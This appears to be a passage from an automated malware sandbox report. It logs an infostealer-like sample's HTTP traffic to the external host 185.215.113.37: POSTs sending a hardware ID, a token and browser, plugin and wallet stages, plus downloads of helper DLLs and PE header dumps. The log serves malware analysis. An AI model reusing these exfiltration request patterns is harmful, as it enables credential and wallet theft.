00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 06:46:17 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 06:46:18 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 06:46:19 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHCFIDHIDGIDHJEHIDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 42 30 43 32 31 45 46 42 46 39 31 38 35 35 38 31 38 33 35 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 2d 2d 0d 0a Data Ascii: ------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="hwid"0CB0C21EFBF91855818353------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="build"save------IIEHCFIDHIDGIDHJEHID--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDAHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 62 33 36 32 62 36 66 36 35 31 63 65 34 64 31 64 39 64 37 63 39 38 61 33 65 63 62 39 65 61 65 33 34 35 32 30 35 37 34 33 61 38 33 65 61 64 65 33 31 33 37 66 33 64 66 33 63 39 30 64 31 63 63 32 65 38 62 30 62 33 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 2d 2d 0d 0a Data Ascii: ------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="token"9bb362b6f651ce4d1d9d7c98a3ecb9eae345205743a83eade3137f3df3c90d1cc2e8b0b3------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="message"browsers------EBKEHJJDAAAAKECBGHDA--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBAKEHIEBKJJJJJKKKEGHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 62 33 36 32 62 36 66 36 35 31 63 65 34 64 31 64 39 64 37 63 39 38 61 33 65 63 62 39 65 61 65 33 34 35 32 30 35 37 34 33 61 38 33 65 61 64 65 33 31 33 37 66 33 64 66 33 63 39 30 64 31 63 63 32 65 38 62 30 62 33 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 47 2d 2d 0d 0a Data Ascii: ------FBAKEHIEBKJJJJJKKKEGContent-Disposition: form-data; name="token"9bb362b6f651ce4d1d9d7c98a3ecb9eae345205743a83eade3137f3df3c90d1cc2e8b0b3------FBAKEHIEBKJJJJJKKKEGContent-Disposition: form-data; name="message"plugins------FBAKEHIEBKJJJJJKKKEG--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFBGHCAKKFCAKEBKJKKHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 62 33 36 32 62 36 66 36 35 31 63 65 34 64 31 64 39 64 37 63 39 38 61 33 65 63 62 39 65 61 65 33 34 35 32 30 35 37 34 33 61 38 33 65 61 64 65 33 31 33 37 66 33 64 66 33 63 39 30 64 31 63 63 32 65 38 62 30 62 33 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="token"9bb362b6f651ce4d1d9d7c98a3ecb9eae345205743a83eade3137f3df3c90d1cc2e8b0b3------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="message"fplugins------DAFBGHCAKKFCAKEBKJKK--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBGHost: 185.215.113.37Content-Length: 6891Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGIDGCAFCBKECAAKJJKHost: 185.215.113.37Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCBGCAFIIECBFIDHIJKHost: 185.215.113.37Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBFCGIDAKECGCBGDBAFHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 62 33 36 32 62 36 66 36 35 31 63 65 34 64 31 64 39 64 37 63 39 38 61 33 65 63 62 39 65 61 65 33 34 35 32 30 35 37 34 33 61 38 33 65 61 64 65 33 31 33 37 66 33 64 66 33 63 39 30 64 31 63 63 32 65 38 62 30 62 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 2d 2d 0d 0a Data Ascii: ------CFBFCGIDAKECGCBGDBAFContent-Disposition: form-data; name="token"9bb362b6f651ce4d1d9d7c98a3ecb9eae345205743a83eade3137f3df3c90d1cc2e8b0b3------CFBFCGIDAKECGCBGDBAFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CFBFCGIDAKECGCBGDBAFContent-Disposition: form-data; name="file"------CFBFCGIDAKECGCBGDBAF--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFIDAAEHIEGCBFIDBFHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 62 33 36 32 62 36 66 36 35 31 63 65 34 64 31 64 39 64 37 63 39 38 61 33 65 63 62 39 65 61 65 33 34 35 32 30 35 37 34 33 61 38 33 65 61 64 65 33 31 33 37 66 33 64 66 33 63 39 30 64 31 63 63 32 65 38 62 30 62 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 2d 2d 0d 0a Data Ascii: ------DBKFIDAAEHIEGCBFIDBFContent-Disposition: form-data; name="token"9bb362b6f651ce4d1d9d7c98a3ecb9eae345205743a83eade3137f3df3c90d1cc2e8b0b3------DBKFIDAAEHIEGCBFIDBFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DBKFIDAAEHIEGCBFIDBFContent-Disposition: form-data; name="file"------DBKFIDAAEHIEGCBFIDBF--
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCBGCAFIIECBFIDHIJKHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIEHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 62 33 36 32 62 36 66 36 35 31 63 65 34 64 31 64 39 64 37 63 39 38 61 33 65 63 62 39 65 61 65 33 34 35 32 30 35 37 34 33 61 38 33 65 61 64 65 33 31 33 37 66 33 64 66 33 63 39 30 64 31 63 63 32 65 38 62 30 62 33 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 2d 2d 0d 0a Data Ascii: ------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="token"9bb362b6f651ce4d1d9d7c98a3ecb9eae345205743a83eade3137f3df3c90d1cc2e8b0b3------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="message"wallets------HCAFIJDGHCBFHJKFCGIE--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDBAEGIIIEBGCAAFHIHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 62 33 36 32 62 36 66 36 35 31 63 65 34 64 31 64 39 64 37 63 39 38 61 33 65 63 62 39 65 61 65 33 34 35 32 30 35 37 34 33 61 38 33 65 61 64 65 33 31 33 37 66 33 64 66 33 63 39 30 64 31 63 63 32 65 38 62 30 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 